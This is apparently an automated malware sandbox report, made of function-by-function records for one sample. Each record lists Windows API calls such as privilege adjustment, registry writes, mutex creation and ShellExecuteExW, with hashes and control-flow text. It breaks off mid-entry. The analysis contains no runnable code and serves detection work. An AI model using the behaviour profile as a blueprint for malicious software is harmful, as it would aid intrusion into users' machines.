                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 30679170a296a6995bdc00f8e94be450b1f1a2b6daf5451616dfe644d7d88a97
                                                                        • Instruction ID: eda96f4b280767fd5f9ee112ea800a931dbabbdbc04ce60080b108fe98cd5c00
                                                                        • Opcode Fuzzy Hash: 30679170a296a6995bdc00f8e94be450b1f1a2b6daf5451616dfe644d7d88a97
                                                                        • Instruction Fuzzy Hash: 0221D1765097809FEB228F25DC44B52BFF4EF06310F0884DBE9858B5A3D270A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00B8AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 3cbc8d3c81a9687299a09b0f199d5b894edcf1673cb8f6df8e3ccb2ba394c9b6
                                                                        • Instruction ID: 7a7052e4d7d8d4332f61b9056718814ecc670c1e721511bff307541bb14da586
                                                                        • Opcode Fuzzy Hash: 3cbc8d3c81a9687299a09b0f199d5b894edcf1673cb8f6df8e3ccb2ba394c9b6
                                                                        • Instruction Fuzzy Hash: 4A11D0724093C09FDB228F10DD44A52FFF4EF06324F0984CBE9854B6A3D275A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B8A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: e9728d8d70feaca1a11deebf70b570b2528bd690c51e5a24d0e6e30aa4662e1c
                                                                        • Instruction ID: 533a6a42c2250d4dbc71b9eeabc85b83b1578232e4cb0d5a24a7026ae009c469
                                                                        • Opcode Fuzzy Hash: e9728d8d70feaca1a11deebf70b570b2528bd690c51e5a24d0e6e30aa4662e1c
                                                                        • Instruction Fuzzy Hash: 7011A0725042009FEB20DF55D988B52FBE8EF04320F0884AADD468B666D375E818DF62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00B8AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: d172994b5d8226e1fca04191e0478936afbf94907ee95cb534deceaa5b65ec3e
                                                                        • Instruction ID: a5e1f1154d0c95831ddaf727f402a07a9c3305127fbb7f7b22eba23e3c957ecb
                                                                        • Opcode Fuzzy Hash: d172994b5d8226e1fca04191e0478936afbf94907ee95cb534deceaa5b65ec3e
                                                                        • Instruction Fuzzy Hash: 5F018F314002009FEB209F05DA88B61FBE4EF48320F08C49ADE860AB62D375A418DFA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a2a7da57d30367795454ee3658b6430147915b67aa39fe773db4b8aa7e5b2304
                                                                        • Instruction ID: 4570f7b416125a006f59ba1d003173a36f3675775dc3835013bce5ff311164ac
                                                                        • Opcode Fuzzy Hash: a2a7da57d30367795454ee3658b6430147915b67aa39fe773db4b8aa7e5b2304
                                                                        • Instruction Fuzzy Hash: 85722374E00269CFCB24DF68C984BADF7B2BB49309F1085A9D449AB755DB34AE81CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 4d30278-4d302a6 1 4d302a8 call 4d30c10 0->1 2 4d302ae-4d302bc 0->2 1->2 3 4d302c2-4d30305 2->3 4 4d303d8-4d303ec 2->4 22 4d303b9-4d303d2 3->22 7 4d303f2-4d3046b 4->7 8 4d30475-4d304c8 4->8 7->8 20 4d304ca 8->20 21 4d304cf 8->21 20->21 67 4d304cf call b005e0 21->67 68 4d304cf call b00606 21->68 69 4d304cf call 4d30cd8 21->69 70 4d304cf call 4d30cbe 21->70 22->4 23 4d3030a-4d30316 22->23 25 4d30bbd 23->25 26 4d3031c-4d3034d 23->26 24 4d304d5-4d304e9 27 4d30520-4d30677 24->27 28 4d304eb-4d30515 24->28 30 4d30bc2-4d30c05 25->30 38 4d30390-4d303b3 26->38 39 4d3034f-4d30385 26->39 59 4d306ff-4d30bb8 27->59 60 4d3067d-4d306bb 27->60 28->27 38->22 38->30 39->38 60->59 67->24 68->24 69->24 70->24
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 753db121a637ea87e48f5a14f5d73b638999c270506ab29f1bce3903bef3536c
                                                                        • Instruction ID: bc8aad94d7135e342c6878e3662bd3ba6e97b68039a3adf8c3907906e067bd01
                                                                        • Opcode Fuzzy Hash: 753db121a637ea87e48f5a14f5d73b638999c270506ab29f1bce3903bef3536c
                                                                        • Instruction Fuzzy Hash: A7B16930A01218CFDB25EF74C954BADB7F2AF45309F1084AAD449AB3A5DB399E85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 71 4d30268-4d302a6 72 4d302a8 call 4d30c10 71->72 73 4d302ae-4d302bc 71->73 72->73 74 4d302c2-4d30305 73->74 75 4d303d8-4d303ec 73->75 93 4d303b9-4d303d2 74->93 78 4d303f2-4d3046b 75->78 79 4d30475-4d304c8 75->79 78->79 91 4d304ca 79->91 92 4d304cf 79->92 91->92 138 4d304cf call b005e0 92->138 139 4d304cf call b00606 92->139 140 4d304cf call 4d30cd8 92->140 141 4d304cf call 4d30cbe 92->141 93->75 94 4d3030a-4d30316 93->94 96 4d30bbd 94->96 97 4d3031c-4d3034d 94->97 95 4d304d5-4d304e9 98 4d30520-4d30677 95->98 99 4d304eb-4d30515 95->99 101 4d30bc2-4d30c05 96->101 109 4d30390-4d303b3 97->109 110 4d3034f-4d30385 97->110 130 4d306ff-4d30bb8 98->130 131 4d3067d-4d306bb 98->131 99->98 109->93 109->101 110->109 131->130 138->95 139->95 140->95 141->95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: a8b08b5a1ee1baab789096c8bf14e5196db00687108345d89234a302aef8cd6f
                                                                        • Instruction ID: d774a223641ef9c59bf4450805d6b8bca0debb5169a1f7fd8780adb87c3b0a54
                                                                        • Opcode Fuzzy Hash: a8b08b5a1ee1baab789096c8bf14e5196db00687108345d89234a302aef8cd6f
                                                                        • Instruction Fuzzy Hash: 3E816C70A01218CFDB15EF75C955BADB7B2AF44309F1080A9D409AB3A5DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 142 4d30392-4d303ad 146 4d303af-4d303b3 142->146 147 4d30bc2-4d30c05 146->147 148 4d303b9-4d303d2 146->148 149 4d3030a-4d30316 148->149 150 4d303d8-4d303ec 148->150 151 4d30bbd 149->151 152 4d3031c-4d3034d 149->152 157 4d303f2-4d3046b 150->157 158 4d30475-4d304c8 150->158 151->147 163 4d30390 152->163 164 4d3034f-4d30385 152->164 157->158 171 4d304ca 158->171 172 4d304cf 158->172 163->146 164->163 171->172 203 4d304cf call b005e0 172->203 204 4d304cf call b00606 172->204 205 4d304cf call 4d30cd8 172->205 206 4d304cf call 4d30cbe 172->206 175 4d304d5-4d304e9 176 4d30520-4d30677 175->176 177 4d304eb-4d30515 175->177 196 4d306ff-4d30bb8 176->196 197 4d3067d-4d306bb 176->197 177->176 197->196 203->175 204->175 205->175 206->175
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 72d3a67e1277f5b798e0368ae41ae880f9336d4a33f5a8e0f42147749bbc8387
                                                                        • Instruction ID: db14dca99fc2ed9f453bdd2db7fd1270b46772c4ea3a4c4c02eeefb09c06b860
                                                                        • Opcode Fuzzy Hash: 72d3a67e1277f5b798e0368ae41ae880f9336d4a33f5a8e0f42147749bbc8387
                                                                        • Instruction Fuzzy Hash: 5C615D70A01218CFDB15EF75C945BECB7B2AF44309F1080E9D409AB6A5DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks 4d30429-4d30bb8, calls to b005e0, b00606, 4d30cd8 and 4d30cbe)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 8ebb18f198ab4ff64e0419bddfc3fd78a1c74b8427ee393ae4d1c82469da85d8
                                                                        • Instruction ID: fe72941e3e7ed7e46941b3065475efd878398e0a9a92cb9e3d7c8d904ed23bba
                                                                        • Opcode Fuzzy Hash: 8ebb18f198ab4ff64e0419bddfc3fd78a1c74b8427ee393ae4d1c82469da85d8
                                                                        • Instruction Fuzzy Hash: 71514A30A012188FDB64EF75C955BECB7B2AF84308F5080E9D409AB694DB396E85CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8ae23-b8af2e, call to CreateFileW)
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00B8AED9
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: d5c1df4a8e7dda0ddc33ada7a022476bc1c8a6ef897a3c3f37b3bbce64c5189a
                                                                        • Instruction ID: f2d2468137e41ff592b3a923dff2a1642a50310fab267afe6d08d65bfc482adc
                                                                        • Opcode Fuzzy Hash: d5c1df4a8e7dda0ddc33ada7a022476bc1c8a6ef897a3c3f37b3bbce64c5189a
                                                                        • Instruction Fuzzy Hash: 9F31B2B15053406FE722CB25DD44B62BFE8EF06314F08449AE9859B662D375E909CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8ab92-b8ac8e, call to CreateMutexW)
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00B8AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 12e9c790658fa1abdcae34e3e1d32f4dd13c436e495a0e283622ccb26306ed15
                                                                        • Instruction ID: c72fb09cbb55424906d780346e3c9c5ce6e880ed6fcf29b614c010a66af4e9cc
                                                                        • Opcode Fuzzy Hash: 12e9c790658fa1abdcae34e3e1d32f4dd13c436e495a0e283622ccb26306ed15
                                                                        • Instruction Fuzzy Hash: 813195B55093806FE711CB25DD45B96FFF8EF06314F0884DAE944CB292D375A909CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8a361-b8a447, call to RegQueryValueExW)
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 4031aa399edebb8032d903750a5251cae818a5fb538a8b7db5bcaee3927626f2
                                                                        • Instruction ID: 37356f59c2814bc99846e93237f7cc12dd3ece60200f3eddf312013730afa215
                                                                        • Opcode Fuzzy Hash: 4031aa399edebb8032d903750a5251cae818a5fb538a8b7db5bcaee3927626f2
                                                                        • Instruction Fuzzy Hash: F33164755057405FE721CF15DC84F92BBF8EF06710F0884DAE9459B6A2D364E909CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8af30-b8affe, call to GetFileType)
                                                                        APIs
                                                                        • GetFileType.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8AFC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: FileType
                                                                        • String ID:
                                                                        • API String ID: 3081899298-0
                                                                        • Opcode ID: 7c7e6779960846235eb2610075b41abb5517c86432bf350257fc9690100a3542
                                                                        • Instruction ID: a652ad4f7d3206220e267b96f1915c289b4c925d41d6c0cf615ccf8c9daca9af
                                                                        • Opcode Fuzzy Hash: 7c7e6779960846235eb2610075b41abb5517c86432bf350257fc9690100a3542
                                                                        • Instruction Fuzzy Hash: 6D2128B54093806FE7128B15DC85BA2BFACEF07720F0980D6E9808B2A3D264A909C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8a462-b8a533, call to RegSetValueExW)
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 0e6125986c7244d14d64c4eb6f5bfc3627b74341e87f7eae0c0e897809e247ea
                                                                        • Instruction ID: f6a2a7899b792aaa17b1151dd15e9e7aae5ec4b5ea747b24893925143acc0bab
                                                                        • Opcode Fuzzy Hash: 0e6125986c7244d14d64c4eb6f5bfc3627b74341e87f7eae0c0e897809e247ea
                                                                        • Instruction Fuzzy Hash: D02181B25043806FE7228B11DD44FA7BFF8DF46710F08849AE9459B6A2D264E948C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8ae5a-b8af2e, call to CreateFileW)
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00B8AED9
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 6f77317016ca0f6a7d7fccafd740502c4903059cb46176fd4d79492ef3b77d19
                                                                        • Instruction ID: faa9a8091bf2d79553d80b9a8e3eed9541fcc20275d29b612e11e95023bd8067
                                                                        • Opcode Fuzzy Hash: 6f77317016ca0f6a7d7fccafd740502c4903059cb46176fd4d79492ef3b77d19
                                                                        • Instruction Fuzzy Hash: A72162B1500600AFE721DF65DD89B66FBE8EF08314F18889EE9459B751D375E808CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8a67b-b8a73d, call to LookupPrivilegeValueW)
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00B8A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: fb6935309538a9da7f76f4b242daac47d721649e80a9ba64429803bc7adfeca7
                                                                        • Instruction ID: fec17ae98a61e095955a0c34384e798733233c2a4c6895d3cb425c6c95d82003
                                                                        • Opcode Fuzzy Hash: fb6935309538a9da7f76f4b242daac47d721649e80a9ba64429803bc7adfeca7
                                                                        • Instruction Fuzzy Hash: 512183755093805FE7128B65DC45B92BFF8EF06320F0D84DBE985CB2A3D224D908D762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8abc6-b8ac8e, call to CreateMutexW)
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00B8AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: b753557fbe3b532ac2dbf3a23673cfcb5d467741f32e98fa20840b4349f76371
                                                                        • Instruction ID: c97f39cc6f5317b14974aa44876325047a0317b6e98be4c1b8861c7c6f283a99
                                                                        • Opcode Fuzzy Hash: b753557fbe3b532ac2dbf3a23673cfcb5d467741f32e98fa20840b4349f76371
                                                                        • Instruction Fuzzy Hash: A2218071504200AFF710DF25DD89BA6FBE8EF04324F1484AAED458B751D775E908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8b0e2-b8b1a9, call to WriteFile)
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8B161
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 471d1347a0eeb8df881d98d7701e6633c52f71ea8f0e9493240bf47c6c3b27c7
                                                                        • Instruction ID: 1fa88f6d5d7fd5970d27481de0053f9cb753ffeccdcdebe2361d5c44d2b6c13d
                                                                        • Opcode Fuzzy Hash: 471d1347a0eeb8df881d98d7701e6633c52f71ea8f0e9493240bf47c6c3b27c7
                                                                        • Instruction Fuzzy Hash: 45219271405380AFD722CF51DD48F96BFB8EF45714F08849AE9459B652D334A908CB75
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (rendered graph not reproduced; basic blocks b8a392-b8a447, call to RegQueryValueExW)
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 94fb04e6bdb86b8f8d5a02218b917205a3360c539d559563b9d11e5369e2540c
                                                                        • Instruction ID: d742710e148d459fdc1e9c93a3656ab4594ff9e94e01c7526b3bd6c1dfd2b550
                                                                        • Opcode Fuzzy Hash: 94fb04e6bdb86b8f8d5a02218b917205a3360c539d559563b9d11e5369e2540c
                                                                        • Instruction Fuzzy Hash: DE218EB56002049FEB20DE15DD88FA6B7ECEF04710F08849AE9469B761D764E809CB76
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B8A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: b915086b17301852b2f3ba582bf4a91eb2a281c506c09e4dff7e7c0f77d9cf3e
                                                                        • Instruction ID: b426dc0892c0fd21768e93bc2efc96a9fff090e275b93902a3c653c143590a13
                                                                        • Opcode Fuzzy Hash: b915086b17301852b2f3ba582bf4a91eb2a281c506c09e4dff7e7c0f77d9cf3e
                                                                        • Instruction Fuzzy Hash: AF21A1725093C05FDB128B25DD54A92BFB4EF07324F0984DBED858F6A3D274A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 548d55c5962a7d3daff52ab5c6157bc8ca750e676099259d5ab45725c2577fe7
                                                                        • Instruction ID: 7ae8f2f1dc59faf83d7108f048f76c3a21cbfb58bcdeb87449cf8f9f7b6c5820
                                                                        • Opcode Fuzzy Hash: 548d55c5962a7d3daff52ab5c6157bc8ca750e676099259d5ab45725c2577fe7
                                                                        • Instruction Fuzzy Hash: 0911B1B2500600AFEB219E11DD48FA6BBECEF14710F08849AED459AB51D374E848CBB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(?), ref: 00B8A330
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 85f8c3aadea1818e3762392112e1ed3daea60b09ca2261196823eb9d88f1b292
                                                                        • Instruction ID: fd6603b9474e315c942ad9794b76ca151b9f5cfd7be56621914e442917252f9d
                                                                        • Opcode Fuzzy Hash: 85f8c3aadea1818e3762392112e1ed3daea60b09ca2261196823eb9d88f1b292
                                                                        • Instruction Fuzzy Hash: CC212C7140D3C05FD7138B259C54A52BFB4DF47224F0D80DBDD858F2A3D269A808DB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteFile.KERNELBASE(?,00000E24,4C89FF0F,00000000,00000000,00000000,00000000), ref: 00B8B161
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 95eb34f6483a2e46bc12e9236c75b0d2025708fbaf9fb6ab45d0d7fa3a697bf8
                                                                        • Instruction ID: d6083e13cd869248f44f3ae30526861677e99c4b49b604c759b463a72877a7cf
                                                                        • Opcode Fuzzy Hash: 95eb34f6483a2e46bc12e9236c75b0d2025708fbaf9fb6ab45d0d7fa3a697bf8
                                                                        • Instruction Fuzzy Hash: 0111B272500200AFEB219F51DD8CFA6FBE8EF04724F04849AEE459B651D374A408CBB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00B8B360
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteShell
                                                                        • String ID:
                                                                        • API String ID: 587946157-0
                                                                        • Opcode ID: 191ff6ad890a76079beea9ba16b1adf80cc74a17d61db94c5af57d869f650a42
                                                                        • Instruction ID: d92e083256934767531fa0b95b9f96696590844b61339abd7adfdc7863d038f7
                                                                        • Opcode Fuzzy Hash: 191ff6ad890a76079beea9ba16b1adf80cc74a17d61db94c5af57d869f650a42
                                                                        • Instruction Fuzzy Hash: 811160755093809FD712CF25DD94B52BFE8DF46220F0884EBED45CB2A2D274A908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00B8A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 1196ff106e1f6b960821d47be776ac7f939944b0773f2ca4b6737d61d02c8202
                                                                        • Instruction ID: 37d6ec1b92096742bb3897982d040f59fda12cd14f0797034cd87ffb90f861ca
